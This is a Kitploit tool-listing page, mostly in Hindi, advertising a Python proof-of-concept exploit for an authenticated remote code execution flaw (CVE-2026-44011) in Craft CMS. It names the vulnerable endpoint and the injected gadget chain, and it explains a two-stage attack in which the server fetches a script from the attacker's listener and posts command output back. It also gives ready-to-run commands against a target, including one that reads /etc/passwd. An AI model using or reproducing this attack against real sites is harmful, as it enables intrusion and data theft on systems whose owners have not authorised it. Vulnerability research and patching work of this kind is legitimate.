Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-44011-poc — CVE-2026-44011 के लिए Python proof-of-concept exploit, जो Yii behavior injection के माध्यम से Craft CMS में authenticated RCE है, जिसमें two-stage command output capture शामिल है। | Kitploit
उपकरण/GitHubGitHub/khush-613/cve-2026-44011-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubkhush-613/cve-2026-44011-poc

CVE-2026-44011-poc

CVE-2026-44011 के लिए Python proof-of-concept exploit, जो Yii behavior injection के माध्यम से Craft CMS में authenticated RCE है, जिसमें two-stage command output capture शामिल है।

रिपॉजिटरी देखें
163 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-44011

Yii behavior injection के माध्यम से Craft CMS में Authenticated RCE।

प्रभावित: 4.0.0–4.17.11, 5.0.0–5.9.17
में ठीक किया गया: 4.17.12, 5.9.18
सलाह: GHSA-qrgm-p9w5-rrfw

भेद्यता

/admin/actions/element-search/search endpoint एक condition parameter स्वीकार करता है जो सीधे ElementCondition::createCondition() में पास हो जाता है, बिना पहले Component::cleanseConfig() को कॉल किए। इसका मतलब है कि Yii की विशेष object-construction keys — __class, as <name> (attach behavior), on <event> (register handler) — तब प्रभावी होती हैं जब FieldLayout object request data से बनाया जाता है।

exploit AttributeTypecastBehavior को attach करता है जिसे Psy\Readline\Hoa\ConsoleProcessus::execute() (एक PSY/Yii internal जो shell commands चलाता है) को उसके typecast callable के रूप में कॉल करने के लिए configure किया गया है। यह behavior beforeSave event पर fire होता है, जिसे Craft उसी request के दौरान trigger करता है।

कोई भी account — यहाँ तक कि एक low-privilege editor — यह कर सकता है। किसी admin अधिकार की आवश्यकता नहीं है।

यह exploit कैसे काम करता है

blind reverse shell के बजाय, यह two-stage output capture का उपयोग करता है:

  1. Stage 1 — एक curl command inject करता है जो आपके नियंत्रण वाले local HTTP listener से एक shell script fetch करता है
  2. Stage 2 — एक दूसरी command inject करता है जो उस script को execute करती है; script अपना output वापस आपके listener पर POST करती है

आपको command output सीधे terminal में मिलता है, किसी nc listener की आवश्यकता नहीं।

आवश्यकताएँ

  • Python 3.8+
  • requests library (pip install requests)
  • target को आपकी machine तक पहुँचने में सक्षम होना चाहिए (callback के लिए)
  • किसी भी Craft CMS account के लिए valid credentials

उपयोग

# Basic — run id on the target
python3 exploit.py \
  -b http://target.com \
  -u [email protected] \
  -p 'password123' \
  -c 'id'

# Custom control panel path
python3 exploit.py -b http://target.com -P /craftcms -u admin -p pass -c 'whoami'

# Specify your callback address when it can't be inferred
python3 exploit.py -b http://target.com -u admin -p pass -c 'cat /etc/passwd' \
  -H 10.10.14.5 --listen-port 8080

# Skip TLS verification (self-signed certs)
python3 exploit.py -b https://target.com -u admin -p pass -c 'id' --no-verify

# Skip version check (e.g. version detection fails)
python3 exploit.py -b http://target.com -u admin -p pass -c 'id' --force

callback host/port वह है जहाँ target output वापस आपको POST करता है। डिफ़ॉल्ट रूप से host आपके route से target तक infer किया जाता है और port OS द्वारा assign किया जाता है। यदि target NAT या VPN के पीछे है तो आपको --callback-host को अपने reachable IP पर point करना होगा।

विकल्प

-b / --base-url       Target origin (required)
-P / --cp-path        Control panel path (default: /admin)
-u / --username       Login name or email (required)
-p / --password       Password (required)
-c / --command        Shell command to execute (required)
-s / --site-id        Craft site ID (default: 1)
-e / --element-type   Element type for the condition (default: craft\elements\Category)
-t / --timeout        Request timeout in seconds (default: 15)
-H / --callback-host  Your reachable address for output callbacks
     --listen-port    Port for output listener (default: OS picks one)
     --no-verify      Skip TLS cert verification
-F / --force          Skip version range check

परीक्षण किया गया

  • Craft CMS 5.9.8, Ubuntu 22.04

अस्वीकरण

केवल authorized security testing और research के लिए।

टूल डाउनलोड करें